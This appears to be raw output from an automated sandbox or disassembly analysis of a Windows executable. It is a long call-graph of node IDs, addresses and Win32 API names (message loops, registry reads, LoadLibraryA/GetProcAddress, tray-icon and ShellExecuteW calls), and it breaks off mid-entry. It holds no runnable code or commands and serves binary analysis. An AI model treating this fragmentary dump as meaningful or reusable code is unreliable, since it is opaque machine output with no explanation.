565a1f 92940->92941 92941->92929 92942 4fed21 PeekMessageW 92942->92959 92943 50f4ea 48 API calls 92943->92959 92944 4febf7 timeGetTime 92944->92959 92946 4f6eed 48 API calls 92946->92959 92947 565557 WaitForSingleObject 92951 565574 GetExitCodeProcess CloseHandle 92947->92951 92947->92959 92948 4fed3a TranslateMessage DispatchMessageW 92948->92942 92950 56588f Sleep 92957 565429 Mailbox 92950->92957 92951->92959 92952 4fedae timeGetTime 93170 4f1caa 49 API calls 92952->93170 92954 565733 Sleep 92954->92957 92955 50dc38 timeGetTime 92955->92957 92957->92955 92957->92959 92962 565926 GetExitCodeProcess 92957->92962 92963 565445 Sleep 92957->92963 92966 565432 Sleep 92957->92966 92967 558c4b 108 API calls 92957->92967 92968 4f2c79 107 API 
calls 92957->92968 92970 5659ae Sleep 92957->92970 92977 4fd6e9 55 API calls 92957->92977 93172 4fd7f7 92957->93172 93177 534cbe 49 API calls Mailbox 92957->93177 93178 4f1caa 49 API calls 92957->93178 93179 4fce19 92957->93179 93185 4f2aae 335 API calls 92957->93185 93186 54ccb2 50 API calls 92957->93186 93187 537a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 92957->93187 93188 536532 63 API calls 3 library calls 92957->93188 92959->92925 92959->92928 92959->92932 92959->92935 92959->92942 92959->92943 92959->92944 92959->92946 92959->92947 92959->92948 92959->92950 92959->92952 92959->92954 92959->92957 92961 4f2aae 311 API calls 92959->92961 92959->92963 92971 4f1caa 49 API calls 92959->92971 92976 4ffe30 311 API calls 92959->92976 92980 503200 311 API calls 92959->92980 92982 4fd6e9 55 API calls 92959->92982 92983 4fce19 48 API calls 92959->92983 93073 4ff110 92959->93073 93138 5045e0 92959->93138 93155 50e244 92959->93155 93160 50dc5f 92959->93160 93165 4feed0 335 API calls Mailbox 92959->93165 93166 4fef00 86 API calls 92959->93166 93171 558d23 48 API calls 92959->93171 92961->92959 92964 565952 CloseHandle 92962->92964 92965 56593c WaitForSingleObject 92962->92965 92963->92959 92964->92957 92965->92959 92965->92964 92966->92963 92967->92957 92968->92957 92970->92959 92971->92959 92976->92959 92977->92957 92980->92959 92982->92959 92983->92959 92984->92812 92985->92865 92986->92863 92987->92863 92988->92863 92990 4ffe50 92989->92990 93013 4ffe7e 92989->93013 92992 50f4ea 48 API calls 92990->92992 92991 510f0a 52 API calls __cinit 92991->93013 92992->93013 92993 50146e 92994 4f6eed 48 API calls 92993->92994 93015 4fffe1 92994->93015 92995 4fd7f7 48 API calls 92995->93013 92997 500509 94062 53cc5c 86 API calls 4 library calls 92997->94062 92998 50f4ea 48 API calls 92998->93013 93000 501473 94061 53cc5c 86 API calls 4 library calls 93000->94061 93002 56a246 93007 4f6eed 48 API calls 93002->93007 93003 56a922 
93003->92863 93006 4f6eed 48 API calls 93006->93013 93007->93015 93008 56a873 93008->92863 93009 5297ed InterlockedDecrement 93009->93013 93010 56a30e 93010->93015 94059 5297ed InterlockedDecrement 93010->94059 93012 56a973 94063 53cc5c 86 API calls 4 library calls 93012->94063 93013->92991 93013->92993 93013->92995 93013->92997 93013->92998 93013->93000 93013->93002 93013->93006 93013->93009 93013->93010 93013->93012 93013->93015 93017 5015b5 93013->93017 94057 501820 335 API calls 2 library calls 93013->94057 94058 501d10 59 API calls Mailbox 93013->94058 93015->92863 93016 56a982 94060 53cc5c 86 API calls 4 library calls 93017->94060 93018->92810 93019->92812 93021 4fd654 93020->93021 93028 4fd67e 93020->93028 93022 4fd65b 93021->93022 93024 4fd6c2 93021->93024 93023 4fd666 93022->93023 93029 4fd6ab 93022->93029 94064 4fd9a0 53 API calls __cinit 93023->94064 93024->93029 94066 50dce0 53 API calls 93024->94066 93028->92826 93028->92827 93029->93028 94065 50dce0 53 API calls 93029->94065 93030->92865 93031->92856 93032->92856 93033->92813 93034->92865 93035->92842 93036->92865 93037->92865 93038->92865 93039->92863 93040->92863 93041->92863 93042->92863 93044 4fd6f4 93043->93044 93046 4fd71b 93044->93046 94067 4fd764 55 API calls 93044->94067 93046->92841 93047->92865 93048->92859 93050 4f6ef8 93049->93050 93051 4f6f00 93049->93051 94068 4fdd47 48 API calls _memcpy_s 93050->94068 93051->92862 93053->92869 93054->92865 93056 4fbe0d 93055->93056 93060 4fbe0a _memcpy_s 93055->93060 93057 50f4ea 48 API calls 93056->93057 93058 4fbe17 93057->93058 93061 50ee75 93058->93061 93060->92914 93063 50f4ea __calloc_impl 93061->93063 93062 51395c __crtGetStringTypeA_stat 47 API calls 93062->93063 93063->93062 93064 50f50c 93063->93064 93065 50f50e std::exception::exception 93063->93065 93064->93060 93070 516805 RaiseException 93065->93070 93067 50f538 93071 51673b 47 API calls _free 93067->93071 93069 50f54a 93069->93060 93070->93067 93071->93069 93072->92921 93074 4ff130 
93073->93074 93076 4ffe30 335 API calls 93074->93076 93080 4ff199 93074->93080 93075 4ff3dd 93079 5687c8 93075->93079 93091 4ff3f2 93075->93091 93125 4ff431 Mailbox 93075->93125 93078 568728 93076->93078 93077 4ff595 93084 4fd7f7 48 API calls 93077->93084 93077->93125 93078->93080 93206 53cc5c 86 API calls 4 library calls 93078->93206 93209 53cc5c 86 API calls 4 library calls 93079->93209 93080->93075 93080->93077 93086 4fd7f7 48 API calls 93080->93086 93117 4ff229 93080->93117 93081 4ffe30 335 API calls 93081->93125 93085 5687a3 93084->93085 93208 510f0a 52 API calls __cinit 93085->93208 93088 568772 93086->93088 93087 568b1b 93106 568bcf 93087->93106 93107 568b2c 93087->93107 93207 510f0a 52 API calls __cinit 93088->93207 93089 53cc5c 86 API calls 93089->93125 93097 4ff418 93091->93097 93210 539af1 48 API calls 93091->93210 93092 4ff770 93100 568a45 93092->93100 93116 4ff77a 93092->93116 93094 4fd6e9 55 API calls 93094->93125 93096 568c53 93224 53cc5c 86 API calls 4 library calls 93096->93224 93097->93087 93118 4ff6aa 93097->93118 93097->93125 93098 568810 93211 54eef8 335 API calls 93098->93211 93099 4ffe30 335 API calls 93099->93118 93216 50c1af 48 API calls 93100->93216 93101 568b7e 93219 54e40a 335 API calls Mailbox 93101->93219 93221 53cc5c 86 API calls 4 library calls 93106->93221 93218 54f5ee 335 API calls 93107->93218 93108 568beb 93222 54bdbd 335 API calls Mailbox 93108->93222 93112 501b90 48 API calls 93112->93125 93115 568c00 93136 4ff537 Mailbox 93115->93136 93223 53cc5c 86 API calls 4 library calls 93115->93223 93189 501b90 93116->93189 93117->93075 93117->93077 93117->93097 93117->93125 93118->93092 93118->93099 93119 4ffce0 93118->93119 93118->93125 93118->93136 93119->93136 93220 53cc5c 86 API calls 4 library calls 93119->93220 93121 568823 93121->93097 93124 56884b 93121->93124 93212 54ccdc 48 API calls 93124->93212 93125->93081 93125->93089 93125->93094 93125->93096 93125->93101 93125->93108 93125->93112 93125->93119 93125->93136 93205 4fdd47 48 
94532->94479 94534 516e2b 94533->94534 94539 516cb5 94534->94539 94538 516e46 94538->94482 94540 516ccf _memset __call_reportfault 94539->94540 94541 516cef IsDebuggerPresent 94540->94541 94547 5181ac SetUnhandledExceptionFilter UnhandledExceptionFilter 94541->94547 94543 51a70c __fltout2 6 API calls 94544 516dd6 94543->94544 94546 518197 GetCurrentProcess TerminateProcess 94544->94546 94545 516db3 __call_reportfault 94545->94543 94546->94538 94547->94545 94548->94486 94550 517cf4 __lock 47 API calls 94549->94550 94551 511410 94550->94551 94614 517e58 LeaveCriticalSection 94551->94614 94553 4f3a88 94554 51146d 94553->94554 94555 511491 94554->94555 94556 511477 94554->94556 94555->94494 94556->94555 94615 517c0e 47 API calls __getptd_noexit 94556->94615 94558 511481 94616 516e10 8 API calls __swprintf 94558->94616 94560 51148c 94560->94494 94561->94496 94563 4f3d26 __ftell_nolock 94562->94563 94564 4fd7f7 48 API calls 94563->94564 94565 4f3d31 GetCurrentDirectoryW 94564->94565 94617 4f61ca 94565->94617 94567 4f3d57 IsDebuggerPresent 94568 561cc1 MessageBoxA 94567->94568 94569 4f3d65 94567->94569 94571 561cd9 94568->94571 94569->94571 94572 4f3d82 94569->94572 94601 4f3e3a 94569->94601 94570 4f3e41 SetCurrentDirectoryW 94573 4f3e4e Mailbox 94570->94573 94742 50c682 48 API calls 94571->94742 94691 4f40e5 94572->94691 94573->94498 94576 561ce9 94581 561cff SetCurrentDirectoryW 94576->94581 94578 4f3da0 GetFullPathNameW 94579 4f6a63 48 API calls 94578->94579 94580 4f3ddb 94579->94580 94707 4f6430 94580->94707 94581->94573 94584 4f3df6 94585 4f3e00 94584->94585 94743 5371fa AllocateAndInitializeSid CheckTokenMembership FreeSid 94584->94743 94723 4f3e6e GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 94585->94723 94588 561d1c 94588->94585 94591 561d2d 94588->94591 94593 4f5374 50 API calls 94591->94593 94592 4f3e0a 94594 4f3e1f 94592->94594 94731 4f4ffc 94592->94731 94595 561d35 94593->94595 94597 4fe8d0 335 API calls 94594->94597 94598 4fce19 48 API calls 
94595->94598 94599 4f3e2a 94597->94599 94600 561d42 94598->94600 94599->94601 94741 4f3847 Shell_NotifyIconW _memset 94599->94741 94603 561d6e 94600->94603 94604 561d49 94600->94604 94601->94570 94605 4f518c 48 API calls 94603->94605 94606 4f518c 48 API calls 94604->94606 94607 561d6a GetForegroundWindow ShellExecuteW 94605->94607 94608 561d54 94606->94608 94611 561d9e Mailbox 94607->94611 94744 4f510d 94608->94744 94611->94601 94613 4f518c 48 API calls 94613->94607 94614->94553 94615->94558 94616->94560 94753 50e99b 94617->94753 94621 4f61eb 94622 4f5374 50 API calls 94621->94622 94623 4f61ff 94622->94623 94624 4fce19 48 API calls 94623->94624 94625 4f620c 94624->94625 94770 4f39db 94625->94770 94627 4f6216 Mailbox 94628 4f6eed 48 API calls 94627->94628 94629 4f622b 94628->94629 94782 4f9048 94629->94782 94632 4fce19 48 API calls 94633 4f6244 94632->94633 94634 4fd6e9 55 API calls 94633->94634 94635 4f6254 Mailbox 94634->94635 94636 4fce19 48 API calls 94635->94636 94637 4f627c 94636->94637 94638 4fd6e9 55 API calls 94637->94638 94639 4f628f Mailbox 94638->94639 94640 4fce19 48 API calls 94639->94640 94641 4f62a0 94640->94641 94642 4fd645 53 API calls 94641->94642 94643 4f62b2 Mailbox 94642->94643 94644 4fd7f7 48 API calls 94643->94644 94645 4f62c5 94644->94645 94785 4f63fc 94645->94785 94649 4f62df 94650 4f62e9 94649->94650 94651 561c08 94649->94651 94653 510fa7 _W_store_winword 59 API calls 94650->94653 94652 4f63fc 48 API calls 94651->94652 94654 561c1c 94652->94654 94655 4f62f4 94653->94655 94657 4f63fc 48 API calls 94654->94657 94655->94654 94656 4f62fe 94655->94656 94658 510fa7 _W_store_winword 59 API calls 94656->94658 94659 561c38 94657->94659 94660 4f6309 94658->94660 94662 4f5374 50 API calls 94659->94662 94660->94659 94661 4f6313 94660->94661 94663 510fa7 _W_store_winword 59 API calls 94661->94663 94665 561c5d 94662->94665 94664 4f631e 94663->94664 94666 4f635f 94664->94666 94668 561c86 94664->94668 94671 4f63fc 48 API calls 94664->94671 94667 4f63fc 48 
API calls 94665->94667 94666->94668 94669 4f636c 94666->94669 94670 561c69 94667->94670 94672 4f6eed 48 API calls 94668->94672 94676 50c050 48 API calls 94669->94676 94673 4f6eed 48 API calls 94670->94673 94674 4f6342 94671->94674 94675 561ca8 94672->94675 94677 561c77 94673->94677 94678 4f6eed 48 API calls 94674->94678 94679 4f63fc 48 API calls 94675->94679 94680 4f6384 94676->94680 94681 4f63fc 48 API calls 94677->94681 94682 4f6350 94678->94682 94683 561cb5 94679->94683 94684 501b90 48 API calls 94680->94684 94681->94668 94685 4f63fc 48 API calls 94682->94685 94683->94683 94688 4f6394 94684->94688 94685->94666 94686 501b90 48 API calls 94686->94688 94688->94686 94689 4f63fc 48 API calls 94688->94689 94690 4f63d6 Mailbox 94688->94690 94801 4f6b68 48 API calls 94688->94801 94689->94688 94690->94567 94692 4f40f2 __ftell_nolock 94691->94692 94693 4f410b 94692->94693 94694 56370e _memset 94692->94694 94695 4f660f 49 API calls 94693->94695 94696 56372a GetOpenFileNameW 94694->94696 94697 4f4114 94695->94697 94698 563779 94696->94698 94844 4f40a7 94697->94844 94701 4f6a63 48 API calls 94698->94701 94703 56378e 94701->94703 94703->94703 94704 4f4129 94862 4f4139 94704->94862 94708 4f643d __ftell_nolock 94707->94708 95035 4f4c75 94708->95035 94710 4f6442 94711 4f3dee 94710->94711 95046 4f5928 86 API calls 94710->95046 94711->94576 94711->94584 94713 4f644f 94713->94711 95047 4f5798 88 API calls Mailbox 94713->95047 94715 4f6458 94715->94711 94716 4f645c GetFullPathNameW 94715->94716 94717 4f6a63 48 API calls 94716->94717 94718 4f6488 94717->94718 94719 4f6a63 48 API calls 94718->94719 94720 4f6495 94719->94720 94721 565dcf _wcscat 94720->94721 94722 4f6a63 48 API calls 94720->94722 94722->94711 94724 4f3ed8 94723->94724 94725 561cba 94723->94725 95049 4f4024 94724->95049 94729 4f3e05 94730 4f36b8 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 94729->94730 94730->94592 94732 4f5027 _memset 94731->94732 95054 4f4c30 94732->95054 94736 4f50ca Shell_NotifyIconW 95058 
4f51af 94736->95058 94737 563d28 Shell_NotifyIconW 94739 4f50ac 94739->94736 94739->94737 94740 4f50df 94740->94594 94741->94601 94742->94576 94743->94588 94745 4f511f 94744->94745 94746 561be7 94744->94746 95081 4fb384 94745->95081 95090 52a58f 48 API calls _memcpy_s 94746->95090 94749 561bf1 94751 4f6eed 48 API calls 94749->94751 94750 4f512b 94750->94613 94752 561bf9 Mailbox 94751->94752 94754 4fd7f7 48 API calls 94753->94754 94755 4f61db 94754->94755 94756 4f6009 94755->94756 94757 4f6016 __ftell_nolock 94756->94757 94758 4f6a63 48 API calls 94757->94758 94763 4f617c Mailbox 94757->94763 94760 4f6048 94758->94760 94768 4f607e Mailbox 94760->94768 94802 4f61a6 94760->94802 94761 4f61a6 48 API calls 94761->94768 94762 4f614f 94762->94763 94764 4fce19 48 API calls 94762->94764 94763->94621 94766 4f6170 94764->94766 94765 4fce19 48 API calls 94765->94768 94767 4f64cf 48 API calls 94766->94767 94767->94763 94768->94761 94768->94762 94768->94763 94768->94765 94769 4f64cf 48 API calls 94768->94769 94769->94768 94771 4f41a9 136 API calls 94770->94771 94772 4f39fe 94771->94772 94773 4f3a06 94772->94773 94805 53c396 94772->94805 94773->94627 94775 562ff0 94778 511c9d _free 47 API calls 94775->94778 94777 4f4252 84 API calls 94777->94775 94779 562ffd 94778->94779 94780 4f4252 84 API calls 94779->94780 94781 563006 94780->94781 94781->94781 94783 50f4ea 48 API calls 94782->94783 94784 4f6237 94783->94784 94784->94632 94786 4f641f 94785->94786 94787 4f6406 94785->94787 94789 4f6a63 48 API calls 94786->94789 94788 4f6eed 48 API calls 94787->94788 94790 4f62d1 94788->94790 94789->94790 94791 510fa7 94790->94791 94792 510fb3 94791->94792 94793 511028 94791->94793 94800 510fd8 94792->94800 94841 517c0e 47 API calls __getptd_noexit 94792->94841 94843 51103a 59 API calls 4 library calls 94793->94843 94796 511035 94796->94649 94797 510fbf 94842 516e10 8 API calls __swprintf 94797->94842 94799 510fca 94799->94649 94800->94649 94801->94688 94803 4fbdfa 48 API calls 94802->94803 
94804 4f61b1 94803->94804 94804->94760 94806 4f4517 83 API calls 94805->94806 94807 53c405 94806->94807 94808 53c56d 94 API calls 94807->94808 94809 53c417 94808->94809 94810 4f44ed 64 API calls 94809->94810 94838 53c41b 94809->94838 94811 53c432 94810->94811 94812 4f44ed 64 API calls 94811->94812 94813 53c442 94812->94813 94814 4f44ed 64 API calls 94813->94814 94815 53c45d 94814->94815 94816 4f44ed 64 API calls 94815->94816 94817 53c478 94816->94817 94818 4f4517 83 API calls 94817->94818 94819 53c48f 94818->94819 94820 51395c __crtGetStringTypeA_stat 47 API calls 94819->94820 94821 53c496 94820->94821 94822 51395c __crtGetStringTypeA_stat 47 API calls 94821->94822 94823 53c4a0 94822->94823 94824 4f44ed 64 API calls 94823->94824 94825 53c4b4 94824->94825 94826 53bf5a GetSystemTimeAsFileTime 94825->94826 94827 53c4c7 94826->94827 94828 53c4f1 94827->94828 94829 53c4dc 94827->94829 94830 53c4f7 94828->94830 94831 53c556 94828->94831 94832 511c9d _free 47 API calls 94829->94832 94840 53b965 118 API calls __fcloseall 94830->94840 94835 511c9d _free 47 API calls 94831->94835 94833 53c4e2 94832->94833 94836 511c9d _free 47 API calls 94833->94836 94835->94838 94836->94838 94837 53c54e 94839 511c9d _free 47 API calls 94837->94839 94838->94775 94838->94777 94839->94838 94840->94837 94841->94797 94842->94799 94843->94796 94845 51f8a0 __ftell_nolock 94844->94845 94846 4f40b4 GetLongPathNameW 94845->94846 94847 4f6a63 48 API calls 94846->94847 94848 4f40dc 94847->94848 94849 4f49a0 94848->94849 94850 4fd7f7 48 API calls 94849->94850 94851 4f49b2 94850->94851 94852 4f660f 49 API calls 94851->94852 94853 4f49bd 94852->94853 94854 4f49c8 94853->94854 94858 562e35 94853->94858 94855 4f64cf 48 API calls 94854->94855 94857 4f49d4 94855->94857 94896 4f28a6 94857->94896 94860 562e4f 94858->94860 94902 50d35e 60 API calls 94858->94902 94861 4f49e7 Mailbox 94861->94704 94863 4f41a9 136 API calls 94862->94863 94864 4f415e 94863->94864 94865 563489 94864->94865 94866 4f41a9 136 API calls 
94864->94866 94867 53c396 122 API calls 94865->94867 94868 4f4172 94866->94868 94869 56349e 94867->94869 94868->94865 94872 4f417a 94868->94872 94870 5634a2 94869->94870 94871 5634bf 94869->94871 94873 4f4252 84 API calls 94870->94873 94874 50f4ea 48 API calls 94871->94874 94875 4f4186 94872->94875 94876 5634aa 94872->94876 94873->94876 94888 563504 Mailbox 94874->94888 94903 4fc833 94875->94903 94999 536b49 87 API calls _wprintf 94876->94999 94879 5634b8 94879->94871 94881 5636b4 94882 511c9d _free 47 API calls 94881->94882 94883 5636bc 94882->94883 94884 4f4252 84 API calls 94883->94884 94890 5636c5 94884->94890 94885 4fba85 48 API calls 94885->94888 94888->94881 94888->94885 94888->94890 94893 4fce19 48 API calls 94888->94893 94990 532551 94888->94990 94993 4f4dd9 94888->94993 95000 532472 60 API calls 2 library calls 94888->95000 95001 539c12 48 API calls 94888->95001 94889 511c9d _free 47 API calls 94889->94890 94890->94889 94892 4f4252 84 API calls 94890->94892 95002 5325b5 86 API calls 4 library calls 94890->95002 94892->94890 94893->94888 94897 4f28b8 94896->94897 94901 4f28d7 _memcpy_s 94896->94901 94900 50f4ea 48 API calls 94897->94900 94898 50f4ea 48 API calls 94899 4f28ee 94898->94899 94899->94861 94900->94901 94901->94898 94902->94858 94904 4fc843 __ftell_nolock 94903->94904 94905 563095 94904->94905 94906 4fc860 94904->94906 95024 5325b5 86 API calls 4 library calls 94905->95024 95008 4f48ba 49 API calls 94906->95008 94909 5630a8 95025 5325b5 86 API calls 4 library calls 94909->95025 94910 4fc882 95009 4f4550 56 API calls 94910->95009 94912 4fc897 94912->94909 94914 4fc89f 94912->94914 94916 4fd7f7 48 API calls 94914->94916 94915 5630c4 94919 4fc90c 94915->94919 94917 4fc8ab 94916->94917 95010 50e968 49 API calls __ftell_nolock 94917->95010 94921 5630d7 94919->94921 94922 4fc91a 94919->94922 94920 4fc8b7 94923 4fd7f7 48 API calls 94920->94923 94925 4f4907 CloseHandle 94921->94925 94924 511dfc __wsplitpath 47 API calls 94922->94924 94927 4fc8c3 
94923->94927 94932 4fc943 _wcscat _wcscpy 94924->94932 94926 5630e3 94925->94926 94928 4f41a9 136 API calls 94926->94928 94929 4f660f 49 API calls 94927->94929 94930 56310d 94928->94930 94931 4fc8d1 94929->94931 94933 563136 94930->94933 94936 53c396 122 API calls 94930->94936 95011 50eb66 SetFilePointerEx ReadFile 94931->95011 94935 4fc96d SetCurrentDirectoryW 94932->94935 95026 5325b5 86 API calls 4 library calls 94933->95026 94939 50f4ea 48 API calls 94935->94939 94940 563129 94936->94940 94937 4fc8fd 95012 4f46ce SetFilePointerEx SetFilePointerEx 94937->95012 94942 4fc988 94939->94942 94943 563152 94940->94943 94944 563131 94940->94944 94945 4f47b7 48 API calls 94942->94945 94947 4f4252 84 API calls 94943->94947 94946 4f4252 84 API calls 94944->94946 94975 4fc993 Mailbox __NMSG_WRITE 94945->94975 94946->94933 94948 563157 94947->94948 94949 50f4ea 48 API calls 94948->94949 94956 563194 94949->94956 94950 4fca9d 95020 4f4907 94950->95020 94954 4fcaa9 SetCurrentDirectoryW 94977 4fcad1 Mailbox 94954->94977 94955 4f3d98 94955->94578 94955->94601 94958 4fba85 48 API calls 94956->94958 94987 5631dd Mailbox 94958->94987 94960 5633ce 95030 539b72 48 API calls 94960->95030 94961 563467 95034 5325b5 86 API calls 4 library calls 94961->95034 94964 563480 94964->94950 94966 5633f0 95031 5529e8 48 API calls _memcpy_s 94966->95031 94968 5633fd 94971 511c9d _free 47 API calls 94968->94971 94970 56345f 95033 53240b 48 API calls 3 library calls 94970->95033 94971->94977 94972 4fce19 48 API calls 94972->94975 94974 4fba85 48 API calls 94974->94987 94975->94950 94975->94961 94975->94970 94975->94972 95013 4fb337 56 API calls _wcscpy 94975->95013 95014 50c258 GetStringTypeW 94975->95014 95015 4fcb93 59 API calls __wcsnicmp 94975->95015 95016 4fcb5a GetStringTypeW __NMSG_WRITE 94975->95016 95017 5116d0 GetStringTypeW __towlower_l 94975->95017 95018 4fcc24 162 API calls 3 library calls 94975->95018 95019 50c682 48 API calls 94975->95019 95003 4f48dd 94977->95003 94979 532551 48 API 
calls 94979->94987 94981 4fce19 48 API calls 94981->94987 94984 563420 95032 5325b5 86 API calls 4 library calls 94984->95032 94986 563439 94988 511c9d _free 47 API calls 94986->94988 94987->94960 94987->94974 94987->94979 94987->94981 94987->94984 95027 532472 60 API calls 2 library calls 94987->95027 95028 539c12 48 API calls 94987->95028 95029 50c682 48 API calls 94987->95029 94989 56314d 94988->94989 94989->94977 94991 50f4ea 48 API calls 94990->94991 94992 532581 _memcpy_s 94991->94992 94992->94888 94992->94992 94994 4f4dec 94993->94994 94997 4f4e9a 94993->94997 94996 50f4ea 48 API calls 94994->94996 94998 4f4e1e 94994->94998 94995 50f4ea 48 API calls 94995->94998 94996->94998 94997->94888 94998->94995 94998->94997 94999->94879 95000->94888 95001->94888 95002->94890 95004 4f4907 CloseHandle 95003->95004 95005 4f48e5 Mailbox 95004->95005 95006 4f4907 CloseHandle 95005->95006 95007 4f48fc 95006->95007 95007->94955 95008->94910 95009->94912 95010->94920 95011->94937 95012->94919 95013->94975 95014->94975 95015->94975 95016->94975 95017->94975 95018->94975 95019->94975 95021 4f4911 95020->95021 95022 4f4920 95020->95022 95021->94954 95022->95021 95023 4f4925 CloseHandle 95022->95023 95023->95021 95024->94909 95025->94915 95026->94989 95027->94987 95028->94987 95029->94987 95030->94966 95031->94968 95032->94986 95033->94961 95034->94964 95036 4f4c8b 95035->95036 95037 4f4d94 95035->95037 95036->95037 95038 50f4ea 48 API calls 95036->95038 95037->94710 95039 4f4cb2 95038->95039 95040 50f4ea 48 API calls 95039->95040 95041 4f4d22 95040->95041 95041->95037 95042 4fb470 91 API calls 95041->95042 95044 4f4dd9 48 API calls 95041->95044 95045 4fba85 48 API calls 95041->95045 95048 539af1 48 API calls 95041->95048 95042->95041 95044->95041 95045->95041 95046->94713 95047->94715 95048->95041 95050 4f403c LoadImageW 95049->95050 95051 56418d EnumResourceNamesW 95049->95051 95052 4f3ee1 RegisterClassExW 95050->95052 95051->95052 95053 4f3f53 7 API calls 95052->95053 
95053->94729 95055 563c33 95054->95055 95056 4f4c44 95054->95056 95055->95056 95057 563c3c DestroyIcon 95055->95057 95056->94739 95080 535819 61 API calls _W_store_winword 95056->95080 95057->95056 95059 4f51cb 95058->95059 95060 4f52a2 Mailbox 95058->95060 95061 4f6b0f 48 API calls 95059->95061 95060->94740 95062 4f51d9 95061->95062 95063 563ca1 LoadStringW 95062->95063 95064 4f51e6 95062->95064 95067 563cbb 95063->95067 95065 4f6a63 48 API calls 95064->95065 95066 4f51fb 95065->95066 95066->95067 95080->94739 95082 4fb392 95081->95082 95089 4fb3c5 _memcpy_s 95081->95089 95083 4fb3fd 95082->95083 95084 4fb3b8 95082->95084 95082->95089 95086 50f4ea 48 API calls 95083->95086 95085 4fbb85 48 API calls 95084->95085 95085->95089 95087 4fb407 95086->95087 95088 50f4ea 48 API calls 95087->95088 95088->95089 95089->94750 95090->94749 95091 5619ba 95096 50c75a 95091->95096 95095 5619c9 95097 4fd7f7 48 API calls 95096->95097 95098 50c7c8 95097->95098 95104 50d26c 95098->95104 95101 50c865 95102 50c881 95101->95102 95107 50d1fa 48 API calls _memcpy_s 95101->95107 95103 510f0a 52 API calls __cinit 95102->95103 95103->95095 95108 50d298 95104->95108 95107->95101 95109 50d2a5 95108->95109 95111 50d28b 95108->95111 95110 50d2ac RegOpenKeyExW 95109->95110 95109->95111 95110->95111 95112 50d2c6 RegQueryValueExW 95110->95112 95111->95101 95113 50d2e7 95112->95113 95114 50d2fc RegCloseKey 95112->95114 95113->95114 95114->95111 95115 4f3742 95116 4f374b 95115->95116 95117 4f3769 95116->95117 95118 4f37c8 95116->95118 95154 4f37c6 95116->95154 95122 4f382c PostQuitMessage 95117->95122 95123 4f3776 95117->95123 95120 4f37ce 95118->95120 95121 561e00 95118->95121 95119 4f37ab DefWindowProcW 95126 4f37b9 95119->95126 95127 4f37f6 SetTimer RegisterWindowMessageW 95120->95127 95128 4f37d3 95120->95128 95170 4f2ff6 16 API calls 95121->95170 95122->95126 95124 561e88 95123->95124 95125 4f3781 95123->95125 95175 534ddd 60 API calls _memset 95124->95175 95131 4f3789 95125->95131 95132 4f3836 
95125->95132 95127->95126 95133 4f381f CreatePopupMenu 95127->95133 95135 561da3 95128->95135 95136 4f37da KillTimer 95128->95136 95130 561e27 95171 50e312 335 API calls Mailbox 95130->95171 95138 561e6d 95131->95138 95139 4f3794 95131->95139 95160 50eb83 95132->95160 95133->95126 95142 561ddc MoveWindow 95135->95142 95143 561da8 95135->95143 95167 4f3847 Shell_NotifyIconW _memset 95136->95167 95138->95119 95174 52a5f3 48 API calls 95138->95174 95145 4f379f 95139->95145 95146 561e58 95139->95146 95140 561e9a 95140->95119 95140->95126 95142->95126 95147 561dac 95143->95147 95148 561dcb SetFocus 95143->95148 95145->95119 95172 4f3847 Shell_NotifyIconW _memset 95145->95172 95173 5355bd 70 API calls _memset 95146->95173 95147->95145 95150 561db5 95147->95150 95148->95126 95149 4f37ed 95168 4f390f DeleteObject DestroyWindow Mailbox 95149->95168 95169 4f2ff6 16 API calls 95150->95169 95154->95119 95156 561e68 95156->95126 95158 561e4c 95159 4f4ffc 67 API calls 95158->95159 95159->95154 95161 50eb9a _memset 95160->95161 95162 50ec1c 95160->95162 95163 4f51af 50 API calls 95161->95163 95162->95126 95166 50ebc1 95163->95166 95164 50ec05 KillTimer SetTimer 95164->95162 95165 563c7a Shell_NotifyIconW 95165->95164 95166->95164 95166->95165 95167->95149 95168->95126 95169->95126 95170->95130 95171->95145 95172->95158 95173->95156 95174->95154 95175->95140 95176 56197b 95181 50dd94 95176->95181 95180 56198a 95182 50f4ea 48 API calls 95181->95182 95183 50dd9c 95182->95183 95184 50ddb0 95183->95184 95189 50df3d 95183->95189 95188 510f0a 52 API calls __cinit 95184->95188 95188->95180 95190 50df46 95189->95190 95191 50dda8 95189->95191 95221 510f0a 52 API calls __cinit 95190->95221 95193 50ddc0 95191->95193 95194 4fd7f7 48 API calls 95193->95194 95195 50ddd7 GetVersionExW 95194->95195 95196 4f6a63 48 API calls 95195->95196 95197 50de1a 95196->95197 95222 50dfb4 95197->95222 95200 4f6571 48 API calls 95204 50de2e 95200->95204 95202 5624c8 95204->95202 95226 50df77 95204->95226 95205 
50dea4 GetCurrentProcess 95235 50df5f LoadLibraryA GetProcAddress 95205->95235 95206 50debb 95207 50df31 GetSystemInfo 95206->95207 95208 50dee3 95206->95208 95211 50df0e 95207->95211 95229 50e00c 95208->95229 95213 50df21 95211->95213 95214 50df1c FreeLibrary 95211->95214 95213->95184 95214->95213 95215 50df29 GetSystemInfo 95218 50df03 95215->95218 95216 50def9 95232 50dff4 95216->95232 95218->95211 95220 50df09 FreeLibrary 95218->95220 95220->95211 95221->95191 95223 50dfbd 95222->95223 95224 4fb18b 48 API calls 95223->95224 95225 50de22 95224->95225 95225->95200 95236 50df89 95226->95236 95240 50e01e 95229->95240 95233 50e00c 2 API calls 95232->95233 95234 50df01 GetNativeSystemInfo 95233->95234 95234->95218 95235->95206 95237 50dea0 95236->95237 95238 50df92 LoadLibraryA 95236->95238 95237->95205 95237->95206 95238->95237 95239 50dfa3 GetProcAddress 95238->95239 95239->95237 95241 50def1 95240->95241 95242 50e027 LoadLibraryA 95240->95242 95241->95215 95241->95216 95242->95241 95243 50e038 GetProcAddress 95242->95243 95243->95241 95244 5619cb 95249 4f2322 95244->95249 95246 5619d1 95282 510f0a 52 API calls __cinit 95246->95282 95248 5619db 95250 4f2344 95249->95250 95283 4f26df 95250->95283 95255 4fd7f7 48 API calls 95256 4f2384 95255->95256 95257 4fd7f7 48 API calls 95256->95257 95258 4f238e 95257->95258 95259 4fd7f7 48 API calls 95258->95259 95260 4f2398 95259->95260 95261 4fd7f7 48 API calls 95260->95261 95262 4f23de 95261->95262 95263 4fd7f7 48 API calls 95262->95263 95264 4f24c1 95263->95264 95291 4f263f 95264->95291 95268 4f24f1 95269 4fd7f7 48 API calls 95268->95269 95270 4f24fb 95269->95270 95320 4f2745 95270->95320 95272 4f2546 95273 4f2556 GetStdHandle 95272->95273 95274 56501d 95273->95274 95275 4f25b1 95273->95275 95274->95275 95277 